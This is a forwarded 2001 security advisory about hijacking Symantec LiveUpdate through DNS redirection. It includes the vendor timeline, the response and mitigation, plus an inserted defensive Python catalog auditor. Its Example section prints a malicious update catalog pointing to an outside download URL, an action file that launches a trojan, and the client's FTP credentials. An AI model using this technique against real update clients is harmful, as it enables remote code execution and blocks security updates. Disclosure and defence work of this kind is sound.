---------- Forwarded Message ----------
Subject: [Nolug] Fwd: Symantec LiveUpdate attacks
Date: Sat, 6 Oct 2001 09:44:45 +0000
From: Joey Kelly <looseduk@ductape.net>
To: jarc@qth.net, nolug@nolug.org
Cc: joey@bayoulighting.com
---------- Forwarded Message ----------
Subject: Symantec LiveUpdate attacks
Date: Fri, 05 Oct 2001 15:28:27 +0200
From: FX <fx@phenoelit.de>
To: bugtraq@securityfocus.com
Hi all,
attached is an advisory regarding possible attacks on Symantec's
LiveUpdate 1.4 and 1.6. It is also available via HTTP on
http://www.phenoelit.de/stuff/LiveUpdate.txt.
Regards,
FX
--
FX <fx@phenoelit.de>
Phenoelit (http://www.phenoelit.de)
-------------------------------------------------------
--
Joey Kelly
< Minister of the Gospel | Computer Networking Consultant >
http://joeykelly.dhs.org
"When Government fears the people, it's liberty. When people fear the Government, it's tyranny." -- Benjamin Franklin
I would like a Berliner.
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815>
[ Authors ]
FX <fx@phenoelit.de>
DasIch <dasich@phenoelit.de>
kim0 <kim0@phenoelit.de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
Symantec LiveUpdate 1.4
Symantec LiveUpdate 1.6
[ Vendor communication ]
09/22/2001 Symantec contacted via symsecurity@symantec.com
09/24/2001 Symsecurity acknowledges email
09/28/2001 Symsecurity response with detailed statements (see
"Vendor response" section)
10/01/2001 Additional statements from Symsecurity
10/03/2001 Coordination with symsecurity regarding release
Communication from symsecurity stopped at this point in time.
[ Overview ]
LiveUpdate is a tool shipped with most Symantec products to download
updates from the Symantec update servers. It is included as part of
the Norton Antivirus Package and several other products in the Symantec
product line.
Version 1.4 of LiveUpdate (shipped with Norton Antivirus 5.x) can be
used for rapid deployment of hostile code (backdoors, trojan applications,
viruses, worms - if unknown to the NAV pattern file) and for remote
penetration of systems running LiveUpdate via redirection of the initial
connection to a server controlled by the attacker.
Version 1.6 of LiveUpdate (shipped with the latest Norton Antivirus
2001 package) does not allow for this type of attack, but it can be
prevented from downloading virus descriptions and product updates. It
can also be used as part of distributed denial of service attacks by
the same attack as described for version 1.4.
[ Description ]
When LiveUpdate 1.4 is started (either by hand or as a scheduled
task), it looks for the server update.symantec.com. An attacker
can use one of several attacks to return false information to the
querying host such as:
- The attacker controls the DNS server and creates a master
zone for symantec.com.
- The attacker uses routing-based attacks to impersonate the
DNS server.
- The attacker uses DNS poisoning on the DNS server to return
a false IP address.
- The attacker uses layer 2 connection interception to
impersonate the DNS server.
- The attacker sends false DNS responses to the querying host.
When the host running LiveUpdate tries to connect to
update.symantec.com via FTP, it is actually connecting to the FTP
server of the attacker's choice. LiveUpdate will then try to receive the
file livetri.zip located in the FTP server directory /opt/content/onramp.
This archive contains the file LIVEUPDT.TRI which holds a complete
list of all Symantec product updates. After LiveUpdate has received the
file, it will compare the product versions to the versions of the
Symantec products installed on the host and check the appropriate
sequence numbers to see if an update is required. If an update is required,
LiveUpdate will receive the file specified, uncompress it (ZIP format),
and perform the actions described in the .dis file. This includes the
execution of downloaded executables. The reader might see by now how
an attacker can use this behavior in ways other than intended by Symantec.
LiveUpdate 1.6 follows the same procedure described above with one
exception. The actual downloaded update package is different.
First, it's no longer a classic ZIP archive but rather some type of
Symantec data compression. Additionally, the file contains
"cryptographic signatures" of all update files. It was not tested
how strong the cryptographic implementation actually is. This
signature makes it virtually impossible to use LiveUpdate 1.6 as
a penetration tool. However, by specifying a large file location on
the Internet, a scheduled LiveUpdate session in a medium sized
company will lead to network degradation and outages due to the
large amount of traffic generated.
An item of particular note is that version 1.6 does not use
cryptographic signatures to verify the initial list LIVEUPDT.TRI
even though it places signatures on all other files. By applying
the attack described above and never changing the content of the file,
one can prevent any updates the victim host might require.
[ Example ]
An example attack was performed for LiveUpdate 1.4 by taking over a
DNS server and creating a master zone for symantec.com. A false
address for the FTP server update.symantec.com was then returned. This FTP
server was configured with the user 'cust-r2', which is used
by LiveUpdate with the password 'Alpc2p30'. It is not known if all
LiveUpdate installations use the same username and password - but it
is not relevant.
The file /opt/content/onramp/livetri.zip contained a modified
LIVEUPDT.TRI file with the following content:
[LiveUpdate]
Legal=Copyright 1995-2000 (c) Symantec Corporation
LastModified=20010920 05:58PM
Type0=Updates
Type1=Add-Ons
Type2=Documentation
[Mandatory0]
Exclusive=FALSE
ProductName=LiveUpdate
Version=1.4
Language=English
ItemSeqName=LiveUpdateSeq
ItemSeqData=20000508
FileName=ihack.x86
Size=624807
ActionItem=noreboot.dis
TypeName=Updates
ItemName=LiveUpate 1.6
ItemDetails=Hacks your computer using LiveUpdate
Platform=x86
AdminCompatible=FALSE
URL=http://www.phenoelit.de/hackme.x86
While LiveUpdate 1.4 has a preference to use the FileName entry and
try to receive the file via FTP, 1.6 has a preference for the URL given.
Since this is a mandatory update for LiveUpdate itself, it will
receive the file first and then try to update itself.
The file ihack.x86 is actually a renamed ihack.zip file with the
following content:
NOREBOOT.DIS
LUUPDATE.EXE
LUSETUP.EXE
LUUPDATE.EXE is the trojan/backdoor/whatever file the attacker wants
the system to execute. NOREBOOT.DIS is a INI-like file that contains
the actions LiveUpdate should perform when downloading of the file is
complete. It has the following content:
UPDATE (TempDir\*.EXE, LiveUpdateDir, 0)
LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)
LUSETUP.exe was part of a real update package we inspected and might
be left out - this was not tested. We just used the same file as
LUUPDATE.exe and it worked.
When the victim host triggered the update mechanism, it downloaded
livetri.zip and then ihack.x86. It then executed the application
LUUPDATE.exe and told the user that the update was successfully
completed. Thank you.
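As an added example (not part of the advisory and not Symantec's code), the following Python audit parses a LIVEUPDT.TRI catalog and its .dis action file and flags what a defender would want to see before letting a client act on them: an item URL outside the vendor's domain, a mandatory update of the LiveUpdate client itself, and any LAUNCH action that runs a downloaded executable. The trusted domain and the .dis grammar ("VERB (arg, arg, ...)") are assumptions derived from the file contents quoted above.

```python
import configparser
import re
from urllib.parse import urlparse
# Constructed sample: the modified LIVEUPDT.TRI from the advisory, trimmed to the relevant keys.
TRI_SAMPLE = """[LiveUpdate]
Type0=Updates
[Mandatory0]
ProductName=LiveUpdate
FileName=ihack.x86
ActionItem=noreboot.dis
URL=http://www.phenoelit.de/hackme.x86
"""
# Constructed sample: the NOREBOOT.DIS action file from the advisory.
DIS_SAMPLE = r"""UPDATE (TempDir\*.EXE, LiveUpdateDir, 0)
LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)
"""
TRUSTED_DOMAIN = "symantec.com"  # assumption: the only host family an update may come from
ACTION_RE = re.compile(r"^\s*(\w+)\s*\((.*)\)\s*$")  # assumed .dis grammar: VERB (arg, arg, ...)

def parse_dis(text):
    # Return (VERB, [args]) for each action line; lines that do not match are ignored.
    actions = []
    for line in text.splitlines():
        m = ACTION_RE.match(line)
        if m:
            args = [a.strip().strip('"') for a in m.group(2).split(",")]
            actions.append((m.group(1).upper(), args))
    return actions

def audit_catalog(tri_text, dis_files):
    # dis_files maps a lower-cased ActionItem name to the content of that .dis file.
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str  # keep key case exactly as written in the catalog
    cfg.read_string(tri_text)
    findings = []
    for name in cfg.sections():
        if name == "LiveUpdate":  # catalog header, not an update item
            continue
        item = cfg[name]
        host = urlparse(item.get("URL", "")).hostname or ""
        if host and host != TRUSTED_DOMAIN and not host.endswith("." + TRUSTED_DOMAIN):
            findings.append(f"{name}: URL host {host!r} is outside {TRUSTED_DOMAIN}")
        if name.startswith("Mandatory") and item.get("ProductName") == "LiveUpdate":
            findings.append(f"{name}: mandatory update of the LiveUpdate client itself")
        for verb, args in parse_dis(dis_files.get(item.get("ActionItem", "").lower(), "")):
            if verb == "LAUNCH":  # the action that executes a downloaded file
                findings.append(f"{name}: {item.get('ActionItem')} launches {args[1]}")
    return findings
```

Running audit_catalog(TRI_SAMPLE, {"noreboot.dis": DIS_SAMPLE}) yields three findings for the catalog above; a catalog whose URLs stay under symantec.com and whose .dis files contain no LAUNCH yields none.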
[ Vendor Response ]
According to symsecurity@symantec.com, LiveUpdate 1.4 is no longer the
current version and every installation should be updated to version
1.6 by now.
Regarding the redirection of the LiveUpdate client, Symantec stated:
"This is, unfortunately, an underlying issue with the Internet
infrastructure that we are well aware of but have limited control over
other than with connection points over which we exercise authority."
As for the denial of service condition, the statement is:
"The denial of service activity, while potentially possible under the
scenarios you indicate below, would affect only a small percentage of
our user base as any spoofing, redirection would be limited to a local
Internet area/region."
[ Solution ]
The improvements Symantec introduced in LiveUpdate 1.6 and higher are
actually "best practice security". It would be advisable to update all
Symantec products using LiveUpdate to version 1.6. This, however, does
not prevent an attacker from using LiveUpdate as a denial of service
tool or from preventing system updates.
Symantec should use the same cryptographic signature method on the
livetri.zip file and advise its customer base of the fact that
LiveUpdate 1.4 is highly insecure.
Beware! LiveUpdate 1.4 WILL NOT update itself to 1.6 as far as we
are able to determine. The latest LiveUpdate 1.6.x is available from
the URL http://www.symantec.com/techsupp/files/lu/lu.html
According to Symantec, the next version of LiveUpdate will further
enhance security. No statement about the nature of these enhancements
was made.
[ end of file ]
Received on 01/15/02